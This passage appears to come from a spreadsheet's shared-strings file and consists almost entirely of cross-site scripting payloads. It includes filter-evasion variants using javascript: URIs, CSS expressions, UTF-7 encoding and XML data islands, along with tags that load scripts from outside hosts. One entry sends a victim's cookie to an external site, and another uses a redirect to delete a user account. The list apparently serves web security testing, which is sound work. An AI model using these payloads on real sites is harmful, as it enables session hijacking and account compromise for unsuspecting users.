  </si>
  <si>
    <t>&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert(&amp;apos;XSS&amp;apos;);+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t>\&amp;quot;;alert(&amp;apos;XSS&amp;apos;);//</t>
  </si>
  <si>
    <t>&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert("XSS");&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;@im\port&amp;apos;\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)&amp;apos;;&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;jav&amp;#x09;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG&amp;#x0D;SRC&amp;#x0D;=&amp;#x0D;&amp;quot;&amp;#x0D;j&amp;#x0D;a&amp;#x0D;v&amp;#x0D;a&amp;#x0D;s&amp;#x0D;c&amp;#x0D;r&amp;#x0D;i&amp;#x0D;p&amp;#x0D;t&amp;#x0D;:&amp;#x0D;a&amp;#x0D;l&amp;#x0D;e&amp;#x0D;r&amp;#x0D;t&amp;#x0D;(&amp;#x0D;&amp;apos;&amp;#x0D;X&amp;#x0D;S&amp;#x0D;S&amp;#x0D;&amp;apos;&amp;#x0D;)&amp;#x0D;&amp;quot;&amp;#x0D;&amp;gt;&amp;#x0D;</t>
  </si>
  <si>
    <t>perl -e &amp;apos;print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(&amp;quot;XSS&amp;quot;)&gt;&amp;quot;;&amp;apos;&amp;gt; out</t>
  </si>
  <si>
    <t>perl -e &amp;apos;print &amp;quot;&amp;amp;&amp;lt;SCR\0IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;&amp;apos; &amp;gt; out</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;</t>
  </si>
  <si>
    <t>&amp;lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &amp;lt;</t>
  </si>
  <si>
    <t>&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;a=/XSS/</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT =&amp;quot;blah&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=&amp;quot;blah&amp;quot; &amp;apos;&amp;apos; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT &amp;quot;a=&amp;apos;&amp;gt;&amp;apos;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=&amp;quot;&gt;&amp;apos;&gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;h&amp;#x0A;tt&amp;#09;p://6&amp;amp;#09;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://ha.ckers.org@google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://google:ha.ckers.org&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;javascript:document.location=&amp;apos;http://www.google.com/&amp;apos;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;document.vulnerable=true;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img SRC="jav ascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img SRC="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img SRC=" &amp;#14; javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;body onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;SCRIPT&gt;document.vulnerable=true;//&lt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;script &lt;B&gt;document.vulnerable=true;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img SRC="javascript:document.vulnerable=true;"</t>
  </si>
  <si>
    <t>&lt;iframe src="javascript:document.vulnerable=true; &lt;</t>
  </si>
  <si>
    <t>&lt;script&gt;a=/XSS/\ndocument.vulnerable=true;&lt;/script&gt;</t>
  </si>
  <si>
    <t>\";document.vulnerable=true;;//</t>
  </si>
  <si>
    <t>&lt;/title&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;body BACKGROUND="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;body ONLOAD=document.vulnerable=true;&gt;</t>
  </si>
  <si>
    <t>&lt;img DYNSRC="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img LOWSRC="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound SRC="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;br SIZE="&amp;{document.vulnerable=true}"&gt;</t>
  </si>
  <si>
    <t>&lt;LAYER SRC="javascript:document.vulnerable=true;"&gt;&lt;/LAYER&gt;</t>
  </si>
  <si>
    <t>&lt;link REL="stylesheet" HREF="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;li {list-style-image: url("javascript:document.vulnerable=true;");&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</t>
  </si>
  <si>
    <t>&lt;img SRC='vbscript:document.vulnerable=true;'&gt;</t>
  </si>
  <si>
    <t>1script3document.vulnerable=true;1/script3</t>
  </si>
  <si>
    <t>&lt;meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;IFRAME SRC="javascript:document.vulnerable=true;"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:document.vulnerable=true;"&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;table BACKGROUND="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;table&gt;&lt;TD BACKGROUND="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;div STYLE="background-image: url(javascript:document.vulnerable=true;)"&gt;</t>
  </si>
  <si>
    <t>&lt;div STYLE="background-image: url(&amp;#1;javascript:document.vulnerable=true;)"&gt;</t>
  </si>
  <si>
    <t>&lt;div STYLE="width: expression(document.vulnerable=true);"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@im\port'\ja\vasc\ript:document.vulnerable=true';&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"&gt;</t>
  </si>
  <si>
    <t>&lt;XSS STYLE="xss:expression(document.vulnerable=true)"&gt;</t>
  </si>
  <si>
    <t>exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'&gt;</t>
  </si>
  <si>
    <t>&lt;style TYPE="text/javascript"&gt;document.vulnerable=true;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;.XSS{background-image:url("javascript:document.vulnerable=true");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style type="text/css"&gt;BODY{background:url("javascript:document.vulnerable=true")}&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/SCRIPT&gt;&lt;![endif]--&gt;</t>
  </si>
  <si>
    <t>&lt;base HREF="javascript:document.vulnerable=true;//"&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:document.vulnerable=true&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG SRC="javas]]&lt;![cript:document.vulnerable=true;"&gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC="javas&lt;!-- --&gt;cript:document.vulnerable=true"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;document.vulnerable=true&lt;/SCRIPT&gt;"&gt;&lt;/BODY&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;? echo('&lt;SCR)';echo('IPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;'); ?&gt;</t>
  </si>
  <si>
    <t>&lt;meta HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;head&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t>&lt;a href="javascript#document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseover="document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img src="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img dynsrc="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;input type="image" dynsrc="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound src="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&amp;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&amp;{document.vulnerable=true;};</t>
  </si>
  <si>
    <t>&lt;img src=&amp;{document.vulnerable=true;};&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="stylesheet" href="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src="vbscript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img src="mocha:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img src="livescript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;a href="about:&lt;script&gt;document.vulnerable=true;&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;body onload="document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;div style="background-image: url(javascript:document.vulnerable=true;);"&gt;</t>
  </si>
  <si>
    <t>&lt;div style="behaviour: url([link to code]);"&gt;</t>
  </si>
  <si>
    <t>&lt;div style="binding: url([link to code]);"&gt;</t>
  </si>
  <si>
    <t>&lt;div style="width: expression(document.vulnerable=true;);"&gt;</t>
  </si>
  <si>
    <t>&lt;style type="text/javascript"&gt;document.vulnerable=true;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;object classid="clsid:..." codebase="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;![&lt;!--]]&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;!-- -- --&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;&lt;!-- -- --&gt;</t>
  </si>
  <si>
    <t>&lt;img src="blah"onmouseover="document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;img src="blah&gt;" onmouseover="document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;xml src="javascript:document.vulnerable=true;"&gt;</t>
  </si>
  <si>
    <t>&lt;xml id="X"&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>&lt;div datafld="b" dataformatas="html" datasrc="#X"&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>[\xC0][\xBC]script&gt;document.vulnerable=true;[\xC0][\xBC]/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@import'http://www.securitycompass.com/xss.css';&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;meta HTTP-EQUIV="Link" Content="&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;HTML xmlns:xss&gt;&lt;?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;script SRC="http://www.securitycompass.com/xss.jpg"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;</t>
  </si>
  <si>
    <t>&lt;script a="&gt;" SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script ="&gt;" SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script a="&gt;" '' SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script "a='&gt;'" SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script a=`&gt;` SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script a="&gt;'&gt;" SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://www.securitycompass.com/xss.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div style="binding: url(http://www.securitycompass.com/xss.js);"&gt; [Mozilla]</t>
  </si>
  <si>
    <t>&amp;quot;&amp;gt;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;/br style=a:expression(alert())&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;scrscriptipt&amp;gt;alert(1)&amp;lt;/scrscriptipt&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;br size=\&amp;quot;&amp;amp;{alert(&amp;#039;XSS&amp;#039;)}\&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>perl -e &amp;#039;print \&amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;\&amp;quot;;&amp;#039; &amp;gt; out</t>
  </si>
  <si>
    <t>perl -e &amp;#039;print \&amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;\&amp;quot;;&amp;#039; &amp;gt; out</t>
  </si>
  <si>
    <t>&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))&gt;</t>
  </si>
  <si>
    <t>&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)&gt;</t>
  </si>
  <si>
    <t>&lt;~/XSS STYLE=xss:expression(alert('XSS'))&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))&gt;XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))&gt;XSS STYLE=xss:e/**/xpression(alert('XSS'))&gt;&lt;/XSS STYLE=xss:expression(alert('XSS'))&gt;';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//;;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//--&gt;;&lt;;/SCRIPT&gt;;";&gt;;';&gt;;&lt;;SCRIPT&gt;;alert(String.fromCharCode(88,83,83))&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>;';;!--";&lt;;XSS&gt;;=&amp;;{()}</t>
  </si>
  <si>
    <t>&lt;;SCRIPT&gt;;alert(';XSS';)&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT&gt;;alert(String.fromCharCode(88,83,83))&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;BASE HREF=";javascript:alert(';XSS';);//";&gt;;</t>
  </si>
  <si>
    <t>&lt;;BGSOUND SRC=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;BODY BACKGROUND=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;BODY ONLOAD=alert(';XSS';)&gt;;</t>
  </si>
  <si>
    <t>&lt;;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";&gt;;</t>
  </si>
  <si>
    <t>&lt;;DIV STYLE=";background-image: url(&amp;;#1;javascript:alert(';XSS';))";&gt;;</t>
  </si>
  <si>
    <t>&lt;;DIV STYLE=";width: expression(alert(';XSS';));";&gt;;</t>
  </si>
  <si>
    <t>&lt;;FRAMESET&gt;;&lt;;FRAME SRC=";javascript:alert(';XSS';);";&gt;;&lt;;/FRAMESET&gt;;</t>
  </si>
  <si>
    <t>&lt;;IFRAME SRC=";javascript:alert(';XSS';);";&gt;;&lt;;/IFRAME&gt;;</t>
  </si>
  <si>
    <t>&lt;;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=javascript:alert(';XSS';)&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG DYNSRC=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG LOWSRC=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";&gt;;</t>
  </si>
  <si>
    <t>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;;deleteuser</t>
  </si>
  <si>
    <t>exp/*&lt;;XSS STYLE=';no\xss:noxss(";*//*";);</t>
  </si>
  <si>
    <t>&lt;;STYLE&gt;;li {list-style-image: url(";javascript:alert(&amp;#39;XSS&amp;#39;)";);}&lt;;/STYLE&gt;;&lt;;UL&gt;;&lt;;LI&gt;;XSS</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=';vbscript:msgbox(";XSS";)';&gt;;</t>
  </si>
  <si>
    <t>&lt;;LAYER SRC=";http://ha.ckers.org/scriptlet.html";&gt;;&lt;;/LAYER&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";livescript:[code]";&gt;;</t>
  </si>
  <si>
    <t>&lt;;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";&gt;;</t>
  </si>
  <si>
    <t>&lt;;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";mocha:[code]";&gt;;</t>
  </si>
  <si>
    <t>&lt;;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";&gt;;&lt;;/OBJECT&gt;;</t>
  </si>
  <si>
    <t>&lt;;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;;&lt;;param name=url value=javascript:alert(';XSS';)&gt;;&lt;;/OBJECT&gt;;</t>
  </si>
  <si>
    <t>&lt;;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";&gt;;&lt;;/EMBED&gt;;</t>
  </si>
  <si>
    <t>a=";get";;&amp;;#10;b=";URL(";";;&amp;;#10;c=";javascript:";;&amp;;#10;d=";alert(';XSS';);";)";;&amp;#10;eval(a+b+c+d);</t>
  </si>
  <si>
    <t>&lt;;STYLE TYPE=";text/javascript";&gt;;alert(';XSS';);&lt;;/STYLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";&gt;;</t>
  </si>
  <si>
    <t>&lt;;XSS STYLE=";xss:expression(alert(';XSS';))";&gt;;</t>
  </si>
  <si>
    <t>&lt;;STYLE&gt;;.XSS{background-image:url(";javascript:alert(';XSS';)";);}&lt;;/STYLE&gt;;&lt;;A CLASS=XSS&gt;;&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;STYLE type=";text/css";&gt;;BODY{background:url(";javascript:alert(';XSS';)";)}&lt;;/STYLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";&gt;;</t>
  </si>
  <si>
    <t>&lt;;STYLE&gt;;@import';http://ha.ckers.org/xss.css';;&lt;;/STYLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;META HTTP-EQUIV=";Link"; Content=";&lt;;http://ha.ckers.org/xss.css&gt;;; REL=stylesheet";&gt;;</t>
  </si>
  <si>
    <t>&lt;;STYLE&gt;;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}&lt;;/STYLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;TABLE BACKGROUND=";javascript:alert(';XSS';)";&gt;;&lt;;/TABLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;TABLE&gt;;&lt;;TD BACKGROUND=";javascript:alert(';XSS';)";&gt;;&lt;;/TD&gt;;&lt;;/TABLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;HTML xmlns:xss&gt;;</t>
  </si>
  <si>
    <t>&lt;;XML ID=I&gt;;&lt;;X&gt;;&lt;;C&gt;;&lt;;![CDATA[&lt;;IMG SRC=";javas]]&gt;;&lt;;![CDATA[cript:alert(';XSS';);";&gt;;]]&gt;;</t>
  </si>
  <si>
    <t>&lt;;XML ID=";xss";&gt;;&lt;;I&gt;;&lt;;B&gt;;&lt;;IMG SRC=";javas&lt;;!-- --&gt;;cript:alert(';XSS';)";&gt;;&lt;;/B&gt;;&lt;;/I&gt;;&lt;;/XML&gt;;</t>
  </si>
  <si>
